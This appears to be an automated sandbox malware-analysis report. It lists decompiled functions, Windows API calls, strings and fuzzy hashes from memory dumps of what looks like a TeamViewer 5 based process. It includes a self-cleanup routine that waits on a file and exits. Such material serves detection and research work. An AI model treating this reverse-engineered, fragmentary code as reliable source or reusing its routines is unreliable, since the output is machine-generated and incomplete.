                                                                                                                        Function 6F332340, Relevance: 7.5, APIs: 5, Instructions: 34sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332340(intOrPtr* _a4) {
				intOrPtr* _t15;

				Sleep(0xbb8);
				_t15 = _a4;
				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
					do {
						Sleep(0x7d0);
					} while (GetFileAttributesA( *(_t15 + 0x38)) != 0xffffffff);
					E6F331C00(_t15);
					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
					 *(_t15 + 0x24) = 0;
					ExitProcess(0);
				}
				return 0;
			}




                                                                                                                        0x6f33234d
                                                                                                                        0x6f33234f
                                                                                                                        0x6f332356
                                                                                                                        0x6f332365
                                                                                                                        0x6f33236a
                                                                                                                        0x6f332372
                                                                                                                        0x6f332378
                                                                                                                        0x6f33238b
                                                                                                                        0x6f332393
                                                                                                                        0x6f33239a
                                                                                                                        0x6f33239a
                                                                                                                        0x6f3323a5

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 6F33234D
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F33236A
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 6F332370
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33238B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33239A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$AttributesExitFileFreeProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4254501734-0
                                                                                                                        • Opcode ID: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction ID: 569a18e446c410d1e6072e679a0f8067d002a8a09c78fe39bb27979818edb659
                                                                                                                        • Opcode Fuzzy Hash: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction Fuzzy Hash: 43F09A32900B54ABD760EB66CD84B46B3ACBF45B34F210A1DE2869A0C0C7B4F450CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E6B7B, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 299COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E6B82
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                          • Part of subcall function 004E69B9: __EH_prolog3.LIBCMT ref: 004E69C0
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                                          • Part of subcall function 004E7898: __EH_prolog3.LIBCMT ref: 004E789F
                                                                                                                          • Part of subcall function 004E6666: __EH_prolog3.LIBCMT ref: 004E666D
                                                                                                                          • Part of subcall function 004E4AAC: __EH_prolog3.LIBCMT ref: 004E4AB3
                                                                                                                          • Part of subcall function 004E4947: __EH_prolog3.LIBCMT ref: 004E494E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeSection$_malloc
                                                                                                                        • String ID: 127.0.0.1$GWM.CreateClientSession.NoTV$abgehende Verbindung zum internen TV
                                                                                                                        • API String ID: 1928159127-4222465694
                                                                                                                        • Opcode ID: 9af2e94d875c2923571cbc0ad0ef90227fbd2b0c14b112fb4cd1cccabf4603c5
                                                                                                                        • Instruction ID: 3c3d561ff2f9059716d7455960b207cfb48b07e84143a77ce54bf4f6a5edfbaa
                                                                                                                        • Opcode Fuzzy Hash: 9af2e94d875c2923571cbc0ad0ef90227fbd2b0c14b112fb4cd1cccabf4603c5
                                                                                                                        • Instruction Fuzzy Hash: A0C17570D0428DEFDF05EBE5C955AEEBBB5AF19308F10405EE04177282DB786A08DB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E019F, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E01AA
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteH_prolog3__swprintf
                                                                                                                        • String ID: Reason$RouterID$SetState
                                                                                                                        • API String ID: 2349881506-2759572203
                                                                                                                        • Opcode ID: 477a0da1ce706fc61555f92cbe08172d8b8d1595fa9a4a26d9fd11b3a4fe6685
                                                                                                                        • Instruction ID: 8800d0e28e9348c939cb44fead5162335e8717b1e02977930c0735c4cfa60360
                                                                                                                        • Opcode Fuzzy Hash: 477a0da1ce706fc61555f92cbe08172d8b8d1595fa9a4a26d9fd11b3a4fe6685
                                                                                                                        • Instruction Fuzzy Hash: D371927540418CEEDF01EFA4C992ADD7BB8AF21308F14819EF44667192EB786F09C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0050284D, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00502857
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00502883
                                                                                                                          • Part of subcall function 004E6B7B: __EH_prolog3.LIBCMT ref: 004E6B82
                                                                                                                          • Part of subcall function 00504380: _strncpy.LIBCMT ref: 0050438B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3__strncpyinet_ntoa
                                                                                                                        • String ID: #$Abgehend nach UDP
                                                                                                                        • API String ID: 3198417727-4203961990
                                                                                                                        • Opcode ID: fec2ff33af4e4f3641f47cfe900dcb6509f5f9d322439d09ca017e312f0cfc28
                                                                                                                        • Instruction ID: acb5f4cf4234d5cc500a320945d00df3f3d202aa659205eb6c641fcffbb41d1a
                                                                                                                        • Opcode Fuzzy Hash: fec2ff33af4e4f3641f47cfe900dcb6509f5f9d322439d09ca017e312f0cfc28
                                                                                                                        • Instruction Fuzzy Hash: AD51A3B0D00248AFDB10EBE5CD5ABEEBBB8BF55304F14405DE1456B181DBB46E48CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BD7D1, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004BD7D8
                                                                                                                          • Part of subcall function 004BD53E: __EH_prolog3.LIBCMT ref: 004BD55D
                                                                                                                          • Part of subcall function 004BD53E: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000050), ref: 004BD595
                                                                                                                          • Part of subcall function 004BD53E: _wcsrchr.LIBCMT ref: 004BD5A1
                                                                                                                          • Part of subcall function 004BD53E: CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 004BD646
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 0053DE3E: __wfsopen.LIBCMT ref: 0053DE48
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A333B: __EH_prolog3.LIBCMT ref: 004A3342
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$CreateDeleteDirectoryEnterFileH_prolog3_LeaveModuleName__wfsopen_wcsrchr
                                                                                                                        • String ID: Machine:Logging$TeamViewer5_Logfile.log$TeamViewer5_Logfile2.log
                                                                                                                        • API String ID: 3802009478-2121897641
                                                                                                                        • Opcode ID: 9c23b1a807e15231a44482d615fcdb7b21ad7ba84ec6100c9a0aed2bedd050ef
                                                                                                                        • Instruction ID: 6c5781b4bed32351406fd563e79494c6a4f5cfc6a46ae1903238e98fccb940cc
                                                                                                                        • Opcode Fuzzy Hash: 9c23b1a807e15231a44482d615fcdb7b21ad7ba84ec6100c9a0aed2bedd050ef
                                                                                                                        • Instruction Fuzzy Hash: 5351D9B1C05348EECF15EBA4C951ADEBBB8AF25304F1485AEF045A7192EB385F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004FF1E5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FF1EC
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 004FF20D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004FF29E
                                                                                                                          • Part of subcall function 004B9004: shutdown.WS2_32(000000FF,00000001), ref: 004B901A
                                                                                                                          • Part of subcall function 004B9004: closesocket.WS2_32(000000FF), ref: 004B9026
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseH_prolog3HandleInternetclosesocketinet_ntoashutdown
                                                                                                                        • String ID: Tz
                                                                                                                        • API String ID: 1444621331-4125522965
                                                                                                                        • Opcode ID: 3060048a79c542904756a1b86b1718ef9cefadeaefdc11ec60844fc71ab3545c
                                                                                                                        • Instruction ID: 33f1e450042c15d8d9c9b3706301f03ff0524d2692af621af367180bc154b9b2
                                                                                                                        • Opcode Fuzzy Hash: 3060048a79c542904756a1b86b1718ef9cefadeaefdc11ec60844fc71ab3545c
                                                                                                                        • Instruction Fuzzy Hash: 0B51C471D002099BDF15EFA1C896BEE77B4AF00314F14017EEA116B1D2DB785B49C7A9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B7A28, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004B7A32
                                                                                                                          • Part of subcall function 004B5667: __EH_prolog3.LIBCMT ref: 004B566E
                                                                                                                        • type_info::operator==.LIBCMT ref: 004B7A79
                                                                                                                        Strings
                                                                                                                        • GetBool %1%: invalid typeid (.\TVObject.cpp, 133), xrefs: 004B7AD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3_catchtype_info::operator==
                                                                                                                        • String ID: GetBool %1%: invalid typeid (.\TVObject.cpp, 133)
                                                                                                                        • API String ID: 2010590579-284449076
                                                                                                                        • Opcode ID: fa64f7b1247faedaa847d4f6a77f404501e89299800914cca683e46b33a473d1
                                                                                                                        • Instruction ID: a9302d27a509db936128fe6c18a3d3f6a732ec724cc83fb8c508a93be74b9f46
                                                                                                                        • Opcode Fuzzy Hash: fa64f7b1247faedaa847d4f6a77f404501e89299800914cca683e46b33a473d1
                                                                                                                        • Instruction Fuzzy Hash: C131C330A05209EBCF14EBA0C519AEDBB75BF85705F20406AF502BB2D1CB399F45DB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0049B225, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                                        • GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                                          • Part of subcall function 0049B401: __EH_prolog3_GS.LIBCMT ref: 0049B408
                                                                                                                          • Part of subcall function 004377A7: __EH_prolog3.LIBCMT ref: 004377AE
                                                                                                                          • Part of subcall function 0041B2BC: __EH_prolog3.LIBCMT ref: 0041B2C3
                                                                                                                          • Part of subcall function 0043775C: __EH_prolog3.LIBCMT ref: 00437763
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                          • Part of subcall function 0040D733: char_traits.LIBCPMT ref: 0040D758
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ErrorH_prolog3_Lastchar_traits
                                                                                                                        • String ID: operation failed with error $OS_Rng:
                                                                                                                        • API String ID: 2603861822-700108173
                                                                                                                        • Opcode ID: c819b6762bdf678c3ff748db3f1b5579489a0502b56a2e5af61cf74a91ab9eea
                                                                                                                        • Instruction ID: 3dd9ab46a790745f88348808fbd2688a7aa5c78e29401b51255e0c78f3d7e4a6
                                                                                                                        • Opcode Fuzzy Hash: c819b6762bdf678c3ff748db3f1b5579489a0502b56a2e5af61cf74a91ab9eea
                                                                                                                        • Instruction Fuzzy Hash: 69115EB2900158AADB21EBA5DC46EDFBAB8AF55704F00407EF509B7182DA781A09C7B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004FEB31, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FEB38
                                                                                                                        • connect.WS2_32(000000FF,0080B3C4,00000010), ref: 004FEB6D
                                                                                                                        • WSAGetLastError.WS2_32 ref: 004FEB73
                                                                                                                          • Part of subcall function 004A1847: __EH_prolog3_GS.LIBCMT ref: 004A184E
                                                                                                                          • Part of subcall function 004A1847: InitializeCriticalSection.KERNEL32(?,00000028,004BF6CE,?,00000000,00784028,00000000), ref: 004A1863
                                                                                                                          • Part of subcall function 004A1847: _swprintf.LIBCMT ref: 004A1881
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        • ncSocket::NotifySocket(): connect error code: , xrefs: 004FEB96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
